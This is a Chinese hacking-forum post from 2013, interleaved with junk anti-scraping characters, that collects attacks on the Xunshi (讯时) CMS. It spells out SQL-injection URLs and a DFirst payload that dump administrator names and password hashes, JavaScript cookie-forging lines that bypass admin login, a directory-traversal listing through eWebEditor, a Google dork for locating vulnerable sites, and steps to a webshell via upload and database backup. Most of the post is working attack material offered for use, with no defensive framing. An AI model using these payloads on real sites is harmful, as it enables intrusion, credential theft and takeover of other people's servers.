找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2506|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
by:血封忆尘
: E, `1 I5 }/ y2 F4 _  M# T) B* ]/ ~9 n
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)6 e9 S  z9 d" X  q+ y- S. M
* h5 N3 ]4 T& [: E8 S: ?6 M6 f
以下本文总结来自黑防去年第9期杂志上的内容...' v: N8 T( |) _/ m) K( G
  f' j4 q$ n" ~; k) M5 q" R
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%# a, ?0 ^5 S1 ~$ e) I

: Q9 |# f" j, L  V2 W. W26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
1 y4 }2 ^7 Z, E0 v6 ?9 y; d/ L
' d$ x$ M0 T8 Y+ B记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况: Z/ J" b6 L3 u; a9 M2 k
这里一个注入& _0 H2 R! ~; T% k, ]
: o) z& D0 c% D1 _% r2 Q' S
效果如图:
- n( P7 w( ]' O% T) u
6 P# t8 ]6 W" E8 W
4 r# }4 R, I* n& ~
# M+ K+ t; z7 V/ l  h4 Y1 Q这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
. T% ]- L3 {8 {7 F: e: @
7 \0 H, H8 e: W' c7 d密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
: n$ x% p& O5 n/ b2 p
! k$ R6 c/ V! |1 xjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));: O" U+ U& l3 H3 w/ R% g- I
4 |+ ?- \% N$ @% w6 f' A9 k+ H8 ?
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
1 E5 d, r6 v- n' f4 I+ Z( D0 L/ |: |7 J3 Z9 m8 p
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
. R1 _: {# h+ u! s0 `& T  f
. }9 G( D0 f& D它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
- o: r) S( n1 n# c; u4 Z. q: E" B0 G2 m1 z0 y2 E/ v7 |
访问这页面来列目录..步骤如下:9 U& }3 w5 g3 y' r& l! T" S  `

& Y0 g9 O2 A; n6 u* S, U/ O3 R6 Ljavascript:alert(document.cookie="admindj=1")
3 [( u% u: d9 @; K$ i2 O2 ^& a: t( S: R$ Y1 M8 w
http://www.political-security.co ... asp?id=46&dir=../..
4 I' d% w' p. w; k: b' Y# X* T. F0 o# M% t, U3 K) K
效果如图:% F8 R/ s' }3 C" W1 u5 C+ K: M
- a) s+ i* f+ @. w: {9 ]# n

- F% m) O: W, k; |- E8 x4 `% y) W2 a$ I
这样全站目录都能瞧了..找到后台目录..进去.., B  W- O2 y* G. y
8 @1 k: Y; m2 ~
那么进了后台怎么拿shell??上传--备份就ok了..
" |0 q) p  ]- N# s+ p7 A! n: d/ L- \; s
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的.., ?2 b( T/ J4 X, Z

9 m8 u/ Z" Q9 g" L- x6 @这个我也碰到过一次..你都可以通过列目录来实现..
5 M) _& J# P' K/ i
# \% _. k+ [, z3 L/ Z$ y& f( L& Djavascript:alert(document.cookie="admindj=1")
  g$ v- T' p; a0 C6 ?5 l/ _8 V  a8 @+ w+ P1 S. F
http://www.political-security.co ... p?action=BackupData - k4 X* B+ }! [6 G- W* F  G( w

8 u9 z3 {+ _+ r: ~7 S- i备份ok..* b: O9 g3 z; H4 N0 ]5 h+ l- g

* H4 U( k4 d; T5 N5 v% V那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
- u1 y2 K2 v/ W/ H1 f. o7 F" Y
: K* o, W( K0 v4 O在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下, J# Q% {  y" I; \( ~* D) k

$ U" s7 ~2 c- K9 K9 S5 N% `5 l然后访问此页面进行注入..步骤如下:5 o8 r$ |3 ?7 s
. M, D+ b; P) w* ~) t
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")$ n  a5 `7 {4 {! P( r
4 u2 o" Z5 N4 ]2 k
然后请求admin/admin_chk.asp页面+ T7 A, I3 y) N' C* L5 C

3 o  j% E  D: V" r4 D( U输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
8 J( }: b  \& }% X; _* R
$ V  T& w0 v& m# u3 j6 ~7 m4 B26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin4 b8 u+ \' v* @3 S% V

, F( |2 Y- b; L, M* i4 r# f' [效果如图所示:$ Y% X% j% Z3 F' _0 q( R2 i" _8 k

9 V: L6 s) Q! ]) B# ?6 ~& N1 J 7 g8 Q# W! l% f3 |; {6 l

! Q# W* E4 @4 u4 H# l5 k/ G讯时漏洞2/ x9 T7 W  V3 ?. y
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧), N' T" y5 n! M% w8 M" t
' t: T! O) G/ D) C
1、/admin/admin_news_pl_view.asp?id=1
6 w. Y% u" |* n+ Z+ J% B% j! T8 `//id任意 填入以下语句+ O: v* Y! z8 T& Z7 g5 ~; I! T; O
, Y$ N# F& E, V: d
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
* M  M2 v6 j0 A4 k8 r0 G - m% _6 W, X7 }4 J
6 g8 R1 |. S$ z, b

# H0 l4 t  G/ }( e' x) [3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='! x4 |6 q7 G) C* {
  t& ^1 ?+ B  q" R% u  ?% q
' S+ r8 @; P6 J" N

. d, y+ B! S! @! J' ~. \爆出管理员帐号和密码了* z3 Z6 z- c) V3 l& O9 n! w" j

1 d$ v9 X  _# B# v  W  J6 v: e/ z( K/ w" V8 x1 m6 U' L

$ P) y/ }% j, C- f% x: y8 g1 [4、cookies进后台
- X% W0 Y2 Z! N- Y. q. n
+ W9 f5 `; s4 Bjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
5 T0 ]" X. n+ x7 F/ b 8 i- M& \, ]* b) M: b5 A0 n

$ i% b4 z2 z( v9 e# h2 x; A& S: R- t$ s8 O# _% E
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
$ N# \4 w: X- b 0 j7 ~) b& q$ ^. ?& \2 g& T

4 `) Z+ [$ d6 C' d6 q
5 `) u( ~" ]3 N* Q9 O  `' ?6、后台有上传和备份取SHELL不难。
  ?6 @7 z7 }/ @0 d  H # f. ]" }* t+ S3 Q/ Y/ Y! z
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
+ l2 m+ O0 {% b, Y4 I: W
( o$ P% ^* ~+ z6 y逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!# v' x; ], f! a

2 h/ l1 {8 B2 _/ J( A# Y" W! }' q  j7 G; B
: O; O* w$ I+ K( n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表